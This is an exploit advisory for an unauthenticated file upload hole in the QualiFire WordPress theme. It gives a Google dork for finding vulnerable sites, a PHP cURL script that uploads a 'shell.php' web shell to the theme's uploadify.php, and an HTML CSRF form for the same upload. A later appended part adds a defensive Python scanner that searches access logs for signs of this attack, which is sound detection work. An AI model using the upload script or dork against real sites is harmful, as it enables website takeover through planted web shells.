
Wordpress Themes QualiFire File Upload Vulnerability

Saturday, 26 December 2015

#- Title: Wordpress Themes QualiFire File Upload Vulnerability
#- Author: Tn_Scorpion
#- Date: 01-07-2012
#- Developer : AndonDesign
#- Link Download : themeforest .net/item/qualifire-wordpress-theme/105879
#- Google Dork: inurl:"/themes/qualifire/"
#- Fixed in Version : -
#- Tested on : win
=======================================================

-- Proof Of Concept --

Vulnerable : /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php

When vulnerable : blank response

Remote file :
<?php
// Legacy PHP/cURL upload script from the advisory: posts a local file to the
// theme's uploadify.php handler using the old "@file" CURLOPT_POSTFIELDS syntax.
$uploadfile = "shell.php";
$ch = curl_init("http://example .com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('Filedata' => "@$uploadfile",
          'folder'   => '/wp-content/themes/qualifire/scripts/admin/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";
?>

CSRF :
<form
action="http://target .com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Submit">
</form>


Shell Path : Here
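As an added defensive example (not part of the original advisory), the following Python script scans web-server access logs for the pattern this advisory describes: a POST to the theme's uploadify.php, followed by a request for a .php file that appeared in the same uploadify directory. The log lines, IP addresses and file name below are constructed for the example.

```python
import re

# Constructed sample log lines (common log format). IPs and paths are made up
# to mirror the advisory's endpoint; they are not taken from any real server.
SAMPLE_LOG = """\
203.0.113.5 - - [26/Dec/2015:10:01:02 +0000] "POST /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php HTTP/1.1" 200 48
203.0.113.5 - - [26/Dec/2015:10:01:05 +0000] "GET /wp-content/themes/qualifire/scripts/admin/uploadify/shell.php HTTP/1.1" 200 1024
198.51.100.7 - - [26/Dec/2015:10:02:00 +0000] "GET /wp-content/themes/qualifire/style.css HTTP/1.1" 200 2048
198.51.100.9 - - [26/Dec/2015:10:03:00 +0000] "POST /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php HTTP/1.1" 403 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
UPLOADIFY_DIR = "/wp-content/themes/qualifire/scripts/admin/uploadify/"
UPLOADIFY_PHP = UPLOADIFY_DIR + "uploadify.php"


def parse_line(line):
    """Parse one common-log-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_suspicious(log_text):
    """Return (ip, finding) tuples for uploadify.php POSTs and for any fetch of a
    .php file inside the uploadify directory (a dropped script being executed)."""
    findings = []
    uploaded_from = set()  # IPs whose POST to uploadify.php returned 200
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        path, ip = rec["path"].split("?")[0], rec["ip"]
        if rec["method"] == "POST" and path == UPLOADIFY_PHP:
            if rec["status"] == "200":
                uploaded_from.add(ip)
                findings.append((ip, "upload-attempt-succeeded"))
            else:
                findings.append((ip, "upload-attempt-blocked"))
        elif (rec["method"] == "GET" and path.startswith(UPLOADIFY_DIR)
              and path.endswith(".php") and path != UPLOADIFY_PHP):
            kind = "webshell-executed" if ip in uploaded_from else "unexpected-php-in-upload-dir"
            findings.append((ip, kind))
    return findings


if __name__ == "__main__":
    for ip, kind in find_suspicious(SAMPLE_LOG):
        print(f"{ip}\t{kind}")
```

Any hit on uploadify.php is worth triage on its own, since the advisory's endpoint needs no authentication; a subsequent GET of a new .php file in that directory is the stronger signal that the upload was used.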
